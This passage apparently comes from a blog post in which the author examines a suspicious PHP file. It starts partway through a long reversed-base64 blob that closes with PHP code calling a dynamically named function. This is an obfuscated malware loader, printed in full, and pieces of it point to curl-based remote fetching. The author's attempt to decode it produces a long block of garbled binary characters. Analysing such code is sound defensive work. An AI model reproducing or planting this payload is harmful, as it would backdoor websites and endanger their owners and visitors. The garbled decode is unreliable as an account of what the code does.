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")));$HTIRyzRYNNT();?>

Enter fullscreen mode Exit fullscreen mode

Now, to me, that last line looks like it contains some base64 string.

Upon decoding the last large base64 string ("K0...QC"), I got a binary (maybe).

+D+H7EοΏ½+LοΏ½QοΏ½οΏ½οΏ½οΏ½Τ‘οΏ½οΏ½οΏ½οΏ½οΏ½UοΏ½&οΏ½οΏ½@��՘��^�ٜ��]�Տ�
Ψ“οΏ½Τ‘οΏ½οΏ½
ά§οΏ½&οΏ½+LοΏ½οΏ½Ϋ—UοΏ½+D&H6�ݦ�텝�����T&οΏ½οΏ½T&οΏ½οΏ½@��՘��^�ٜ��]�Տ�
Ψ“οΏ½Τ‘οΏ½οΏ½
ά§οΏ½&D+LοΏ½οΏ½Ϋ—UοΏ½&H6οΏ½Κ…QΙ²HοΏ½οΏ½οΏ½Ι‘AοΏ½οΏ½Ω›οΏ½οΏ½οΏ½οΏ½οΏ½Λ˜οΏ½οΏ½οΏ½οΏ½Ι˜οΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½@οΏ½οΏ½QΙ‘AοΏ½οΏ½Ω›οΏ½οΏ½οΏ½οΏ½οΏ½Λ˜οΏ½οΏ½IΙ‹οΏ½οΏ½οΏ½οΏ½Ϋ‘οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½YοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½DοΏ½οΏ½Y����ݘ�QοΏ½οΏ½]έ„οΏ½Λ‹DοΏ½οΏ½YοΏ½οΏ½οΏ½οΏ½οΏ½ οΏ½οΏ½οΏ½ή–Ρ‰οΏ½AοΏ½οΏ½Ω›οΏ½οΏ½οΏ½οΏ½οΏ½Λ˜οΏ½οΏ½Ε›οΏ½οΏ½οΏ½οΏ½Υ˜οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½Γ˜οΏ½οΏ½Ψ›οΏ½U����Ȏ�ݠ���]οΏ½}]������Տ�ə�]οΏ½οΏ½]οΏ½}]οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½Ρ‰οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½Ϊ²T&H6οΏ½Κ§IHοΏ½έ›οΏ½οΏ½ΪŠοΏ½[οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ά¦οΏ½οΏ½UοΏ½&H6οΏ½Θ₯MοΏ½οΏ½οΏ½οΏ½οΏ½UοΏ½&οΏ½οΏ½T+H6οΏ½+D&D+LοΏ½QοΏ½οΏ½οΏ½οΏ½Τ‘οΏ½οΏ½οΏ½οΏ½οΏ½UοΏ½&D+H7EοΏ½&D+LοΏ½
ά”οΏ½Ι°
Ω”οΏ½Ι°οΏ½ΪΊQ���ԑ��ٝYοΏ½}]οΏ½οΏ½Χ•Ω›οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½&D&οΏ½οΏ½IHοΏ½οΏ½\οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½Ω›οΏ½οΏ½&D&H6οΏ½οΏ½οΏ½
ά”οΏ½οΏ½οΏ½ΜœοΏ½ΤŠοΏ½\οΏ½OsQοΏ½οΏ½οΏ½Λ£Μ‰οΏ½
Ω”οΏ½οΏ½&D&H6οΏ½οΏ½DοΏ½οΏ½YοΏ½οΏ½οΏ½οΏ½YοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½YΨ’οΏ½οΏ½οΏ½Υ™οΏ½οΏ½YοΏ½QοΏ½}]οΏ½οΏ½QοΏ½οΏ½XοΏ½Τ‘οΏ½&D&H6�׈MοΏ½οΏ½Ω›οΏ½οΏ½oΩ™οΏ½QοΏ½οΏ½οΏ½ΪΊQοΏ½οΏ½D&D+LοΏ½DοΏ½οΏ½Y���ɧ؏p]οΏ½sοΏ½οΏ½οΏ½οΏ½οΏ½
O���pQ�s܉�M����&D&H6�ʀ���ڽޕȱ
Ψ’οΏ½οΏ½οΏ½οΏ½οΏ½ά οΏ½οΏ½T&H6οΏ½οΏ½@��՘��^�ٜ��]�Տ�
Ψ“οΏ½Τ‘οΏ½οΏ½
ά§οΏ½&D+H6οΏ½οΏ½οΏ½οΏ½οΏ½T&οΏ½οΏ½T&H6οΏ½έ¦οΏ½οΏ½AοΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½Υ™&D&H6οΏ½οΏ½T&D+D&D&D+LοΏ½AοΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½R:Q}Q$οΏ½S%XοΏ½οΏ½MοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½AοΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½D&D&H6οΏ½Κ―οΏ½οΏ½οΏ½οΏ½οΏ½@Θ₯οΏ½οΏ½QοΏ½οΏ½Ω›οΏ½οΏ½οΏ½οΏ½Ο•οΏ½οΏ½οΏ½οΏ½οΏ½UοΏ½οΏ½Ω™&D&D+D+LοΏ½AοΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½   οΏ½οΏ½οΏ½ή–Ρ‰οΏ½EοΏ½οΏ½Θ°οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½MοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ά°οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½UΩ­XοΏ½οΏ½MοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½AοΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½D&D&οΏ½οΏ½DοΏ½οΏ½QοΏ½οΏ½UοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½U٬՝���   οΏ½οΏ½οΏ½ή–έ˜οΏ½XοΏ½οΏ½MοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½AοΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½D&D&οΏ½οΏ½DοΏ½οΏ½QοΏ½οΏ½U����՚���ݜ������՚���ݜ�����QοΏ½οΏ½YοΏ½|οΏ½οΏ½οΏ½TοΏ½οΏ½QοΏ½οΏ½UοΏ½οΏ½οΏ½&D&H6οΏ½Κ•Ψ°Ϋ•Ι±AοΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½AοΏ½οΏ½Q�����՘����\οΏ½οΏ½Ο•Ψ°Ϋ•οΏ½&D&D+LοΏ½AοΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½ή•ΙŠοΏ½οΏ½QοΏ½οΏ½YοΏ½|οΏ½οΏ½οΏ½TοΏ½οΏ½QοΏ½οΏ½UοΏ½οΏ½οΏ½&D&H6οΏ½οΏ½οΏ½οΏ½οΏ½T&D+D&D&D+LοΏ½AοΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½οΏ½YοΏ½οΏ½οΏ½οΏ½UοΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½YοΏ½|οΏ½οΏ½οΏ½TοΏ½οΏ½QοΏ½οΏ½UοΏ½οΏ½οΏ½&D&D+LοΏ½οΏ½οΏ½οΏ½ΙƒοΏ½Ο‚ΙœοΏ½QοΏ½οΏ½οΏ½ΨƒIHΛ™οΏ½oΩ™οΏ½QοΏ½οΏ½
οΏ½οΏ½YοΏ½οΏ½οΏ½οΏ½&D&H6οΏ½Κ¦D���ۊ�[οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ά‡οΏ½\οΏ½οΏ½οΏ½DοΏ½tοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½]οΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½T&D+LοΏ½οΏ½Ϋ—UοΏ½&D+LοΏ½QοΏ½οΏ½οΏ½έΉQοΏ½οΏ½έ˜οΏ½έ›οΏ½οΏ½οΏ½οΏ½οΏ½T&D+LοΏ½ή•Ι‘AοΏ½οΏ½Υ™οΏ½οΏ½MοΏ½M����ӕ�ӝ���۽�&D&H6οΏ½Κ§IHοΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½Q�̜�������]οΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½&D&οΏ½+LοΏ½DοΏ½οΏ½οΏ½Ϋ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½]οΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½&D+H7EοΏ½οΏ½@���ɠ�ِUοΏ½οΏ½XοΏ½οΏ½DΘ°YοΏ½οΏ½οΏ½οΏ½οΏ½Κ°YοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½QοΏ½οΏ½Ι’
οΏ½οΏ½YοΏ½οΏ½οΏ½οΏ½οΏ½AοΏ½οΏ½έΉQ��ݘ���HοΏ½AοΏ½οΏ½οΏ½οΏ½UοΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½DοΏ½οΏ½AοΏ½οΏ½έΉQ��ݘ��[οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½έ˜οΏ½οΏ½Ρ„οΏ½οΏ½YοΏ½TοΏ½οΏ½Q�ӕ�ӝ����DοΏ½οΏ½AοΏ½οΏ½έΉQ��ݘ��[οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ά¦οΏ½οΏ½UοΏ½&H6οΏ½Θ₯
Ϋ‰οΏ½οΏ½οΏ½οΏ½&H6�׈�ںQοΏ½}QοΏ½οΏ½οΏ½Ϋ€οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ΪΊQοΏ½}QοΏ½οΏ½οΏ½Ϋ₯οΏ½οΏ½    ���ޖщ����ݝ�Uϐ���U٬՝��׋���܀���QοΏ½οΏ½οΏ½[�����՚���ݜ���IHοΏ½οΏ½οΏ½οΏ½oΩ™οΏ½QοΏ½TΩ±οΏ½οΏ½οΏ½tοΏ½οΏ½οΏ½QοΏ½οΏ½οΏ½[οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½tοΏ½οΏ½οΏ½YοΏ½οΏ½οΏ½[οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½Ψ‰οΏ½tοΏ½οΏ½οΏ½QοΏ½YoΩ™οΏ½QοΏ½\ڌQοΏ½Q  οΏ½IHοΏ½οΏ½οΏ½οΏ½UΩ¬οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½   οΏ½οΏ½οΏ½ή–Ρ‰&H6οΏ½Κ₯οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½QοΏ½}Ν”οΏ½ΨŠοΏ½οΏ½QοΏ½οΏ½YοΏ½οΏ½οΏ½οΏ½οΏ½\Ϋ›οΏ½οΏ½οΏ½οΏ½Κ™οΏ½οΏ½οΏ½Ϋ°Ω™οΏ½Κ₯οΏ½οΏ½οΏ½οΏ½έ•Ω™οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½UοΏ½Ν‘οΏ½οΏ½H�Ȑ��������ٙXΩ’οΏ½Κ§οΏ½οΏ½Q���ӕ�ӝ���]οΏ½έ—οΏ½οΏ½οΏ½
οΏ½οΏ½οΏ½QοΏ½}Ν”οΏ½ΨˆοΏ½Ψ°Ϋ•οΏ½&H6οΏ½Μ―A^οΏ½UΝ“QοΏ½mοΏ½οΏ½οΏ½HΩ›Ρ‰&H6οΏ½οΏ½οΏ½
Ϋ‰οΏ½οΏ½EοΏ½οΏ½οΏ½οΏ½οΏ½MοΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½Y���ː��UοΏ½οΏ½έ–YοΏ½οΏ½οΏ½ά€οΏ½οΏ½οΏ½οΏ½οΏ½έ›οΏ½ΡŸοΏ½ΡšοΏ½QοΏ½οΏ½Ω˜οΏ½Ω’QοΏ½οΏ½Ω²YοΏ½οΏ½UοΏ½Ω˜οΏ½οΏ½οΏ½έ‘οΏ½οΏ½ά—οΏ½οΏ½οΏ½QοΏ½οΏ½QοΏ½οΏ½QοΏ½οΏ½οΏ½έ‘οΏ½
οΏ½οΏ½οΏ½ά—οΏ½οΏ½οΏ½Ψ΄MοΏ½οΏ½Ω±έ›οΏ½έˆοΏ½οΏ½οΏ½οΏ½Ψ·οΏ½YοΏ½οΏ½ά οΏ½οΏ½T+LοΏ½DοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½MοΏ½οΏ½οΏ½οΏ½οΏ½Ρ›δ•˜οΏ½ΫΌΩ‹qYοΏ½οΏ½ΥžοΏ½οΏ½οΏ½οΏ½ΫΌΩ‹rοΏ½οΏ½UοΏ½Μ•οΏ½οΏ½UοΏ½οΏ½]�����ݝ�ٻ���QοΏ½οΏ½QοΏ½οΏ½ΫΌΩ‹q����џ�њ�Qߠٜ�]οΏ½οΏ½QοΏ½οΏ½YοΏ½οΏ½Ϋ‡ΫΌΩ‹sοΏ½οΏ½ΫΌΩ‹rέœοΏ½ΫΌΩ‹sοΏ½οΏ½οΏ½ΫΌΩ‹qٛ������ݙ����ѝ�]οΏ½οΏ½YοΏ½οΏ½οΏ½οΏ½UοΏ½&οΏ½οΏ½IHIοΏ½QSοΏ½οΏ½HlοΏ½QXοΏ½QOοΏ½IPά¦UΫ’οΏ½ΧˆοΏ½QIYοΏ½WAU οΏ½οΏ½IYI]}οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½tοΏ½οΏ½9]οΏ½TοΏ½U|URlοΏ½QXοΏ½QOοΏ½ITοΏ½οΏ½οΏ½οΏ½DοΏ½οΏ½οΏ½οΏ½@έΌοΏ½οΏ½&H6οΏ½Κ§A^οΏ½UΝ“QοΏ½mοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ά€
οΏ½οΏ½οΏ½&οΏ½&οΏ½οΏ½X6οΏ½Κ¦LοΏ½οΏ½YοΏ½οΏ½έ˜οΏ½οΏ½Σ•οΏ½ΣοΏ½οΏ½οΏ½]οΏ½έ—οΏ½οΏ½οΏ½
οΏ½οΏ½οΏ½QοΏ½}Ν”οΏ½Ψˆ
��ڰU��]��Q�����D+L�L��Y��ݘ������]����
οΏ½οΏ½οΏ½&οΏ½οΏ½@οΏ½οΏ½YοΏ½οΏ½UοΏ½οΏ½Ρ‰&οΏ½+LοΏ½οΏ½Ϋ—YοΏ½6οΏ½+D&οΏ½+LοΏ½QοΏ½οΏ½T+H6οΏ½Κ₯έ½οΏ½οΏ½οΏ½Ϊ°UοΏ½οΏ½]οΏ½οΏ½AοΏ½οΏ½Ω›οΏ½οΏ½MοΏ½MοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½T+LοΏ½D&D+@οΏ½οΏ½οΏ½@οΏ½οΏ½UοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½Ϋ•Ι‘AοΏ½οΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½@ȝIοΏ½οΏ½οΏ½Χ—οΏ½οΏ½οΏ½YοΏ½QοΏ½οΏ½UοΏ½οΏ½Τ‚&D&H7οΏ½οΏ½οΏ½οΏ½Θ₯  οΏ½οΏ½οΏ½οΏ½]οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½@οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½\οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½YοΏ½YοΏ½|οΏ½οΏ½οΏ½D&D&οΏ½οΏ½οΏ½Ω₯���щ��ρę�YοΏ½οΏ½Y��ݘ�D&D&οΏ½οΏ½οΏ½WοΏ½W��ρę�YοΏ½οΏ½D&D&οΏ½οΏ½οΏ½QXοΏ½QOοΏ½IοΏ½οΏ½ΟΘœοΏ½οΏ½ά”οΏ½οΏ½&D&D+@�щ��ρș�Ԃ&D&H6οΏ½οΏ½οΏ½ά‡PοΏ½οΏ½Ρ‰&H6οΏ½οΏ½T+LοΏ½DοΏ½οΏ½ΥšοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½Ϋ•ΫΌέ—οΏ½]οΏ½}QοΏ½οΏ½οΏ½οΏ½οΏ½AοΏ½οΏ½Υ™οΏ½οΏ½MοΏ½MοΏ½οΏ½οΏ½οΏ½οΏ½IοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½Ο•οΏ½Xٍ�&H6οΏ½Κ€οΏ½Ω₯οΏ½οΏ½οΏ½Ρ‰οΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½οΏ½YοΏ½YοΏ½οΏ½οΏ½UοΏ½&οΏ½οΏ½@οΏ½οΏ½YοΏ½οΏ½UοΏ½οΏ½Ρ‰&H6οΏ½Κ‰HοΏ½οΏ½@ή’οΏ½οΏ½οΏ½UοΏ½+D&οΏ½οΏ½οΏ½οΏ½]�����̈]KοΏ½οΏ½ΜˆοΏ½οΏ½οΏ½Υ™&H6οΏ½Κ‰οΏ½οΏ½@ή’οΏ½οΏ½οΏ½UοΏ½+H6οΏ½οΏ½X6οΏ½έ¦οΏ½&H6οΏ½Θ»HοΏ½οΏ½οΏ½PUοΏ½ΜˆοΏ½οΏ½οΏ½Υ™&H6οΏ½οΏ½Ε…οΏ½οΏ½οΏ½οΏ½Ϋ•Ι οΏ½έΉQ��ݘ}οΏ½οΏ½οΏ½YοΏ½YοΏ½οΏ½Κ‰οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½]οΏ½οΏ½UοΏ½οΏ½οΏ½οΏ½οΏ½ΘΈοΏ½έ’οΏ½οΏ½οΏ½έ—οΏ½Υ˜οΏ½οΏ½^��݌�ɰHοΏ½Τ‘οΏ½οΏ½
ά§οΏ½&οΏ½οΏ½DοΏ½οΏ½YΨ“οΏ½οΏ½οΏ½οΏ½οΏ½Ϋ•ΫΌέ—οΏ½QοΏ½}QοΏ½οΏ½οΏ½οΏ½οΏ½H��ڸ�ۼ՚�ٴ���Qɑٟ�YοΏ½QοΏ½~QοΏ½οΏ½]οΏ½TοΏ½οΏ½οΏ½Ε…οΏ½οΏ½οΏ½οΏ½οΏ½Ϊ²T+LοΏ½HοΏ½Τ‘οΏ½οΏ½οΏ½Ω₯οΏ½οΏ½οΏ½Ρ‰οΏ½οΏ½έΉQ��ݘ}οΏ½οΏ½οΏ½YοΏ½YοΏ½οΏ½Κ‰Ι›Γ”οΏ½οΏ½οΏ½οΏ½οΏ½YοΏ½οΏ½οΏ½έ’οΏ½οΏ½οΏ½έ—οΏ½Υ˜οΏ½οΏ½^��݌�ɰHοΏ½Τ‘οΏ½οΏ½
ά§οΏ½&οΏ½μŒ‹οΏ½οΏ½οΏ½οΏ½ΡšοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ΩœU��؈����]οΏ½οΏ½οΏ½οΏ½Μ‹οΏ½οΏ½οΏ½οΏ½οΏ½έ’D+L����̈MQ%οΏ½οΏ½PQA]H�Ȉ����UοΏ½&οΏ½οΏ½XοΏ½Θ„οΏ½οΏ½Ι οΏ½οΏ½X6οΏ½οΏ½TοΏ½οΏ½οΏ½οΏ½οΏ½PΩ΅οΏ½οΏ½Ι‘οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½@οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½+H6οΏ½Κ¦HοΏ½οΏ½οΏ½οΏ½οΏ½YοΏ½}ΩžοΏ½οΏ½έ˜οΏ½οΏ½Ρ„οΏ½οΏ½YοΏ½οΏ½οΏ½U�������ɠ���숈��+H6οΏ½Κ‹DοΏ½EοΏ½οΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½\]οΏ½οΏ½οΏ½XοΏ½οΏ½οΏ½έ˜οΏ½οΏ½Ρ„οΏ½οΏ½YοΏ½οΏ½οΏ½οΏ½οΏ½]οΏ½οΏ½οΏ½6οΏ½+LοΏ½Δ“οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½ΪΆQοΏ½~YάΏU��Њ�]οΏ½~YοΏ½οΏ½6οΏ½μˆ™οΏ½Ω‹οΏ½οΏ½οΏ½UοΏ½οΏ½οΏ½οΏ½
έ‹οΏ½οΏ½οΏ½QοΏ½οΏ½QοΏ½οΏ½@οΏ½οΏ½UοΏ½οΏ½οΏ½6�Ȝڸ�ۼ՚�ٴ�����������+LοΏ½οΏ½οΏ½Ρ‰οΏ½οΏ½οΏ½ά΅οΏ½οΏ½οΏ½Ω₯οΏ½οΏ½οΏ½Ρ‰+H6οΏ½οΏ½@οΏ½οΏ½QοΏ½οΏ½QοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½6οΏ½οΏ½οΏ½μˆ‹οΏ½@οΏ½οΏ½QοΏ½οΏ½QοΏ½οΏ½H6οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½@οΏ½οΏ½οΏ½οΏ½οΏ½XοΏ½οΏ½]�Տ������+LοΏ½DοΏ½οΏ½YοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½QοΏ½οΏ½οΏ½YοΏ½YοΏ½οΏ½PοΏ½οΏ½οΏ½οΏ½+H6�ȟ���DΪ«Υ›οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½Ρ‰+H6οΏ½ΘΌοΏ½οΏ½οΏ½οΏ½Ϋ‘PΩ΅οΏ½οΏ½οΏ½οΏ½οΏ½DΝ“QοΏ½οΏ½οΏ½+H6οΏ½οΏ½οΏ½έ’οΏ½οΏ½UοΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½QΙΉ
άΎοΏ½οΏ½   οΏ½οΏ½οΏ½οΏ½
άΎοΏ½οΏ½@Ω·P��њ�����@��њ�������ܐ��՘����\οΏ½οΏ½οΏ½οΏ½οΏ½Ϋ‘οΏ½6�׊IWοΏ½UMUEYοΏ½οΏ½TοΏ½TοΏ½WοΏ½οΏ½οΏ½έ’οΏ½οΏ½DοΏ½οΏ½
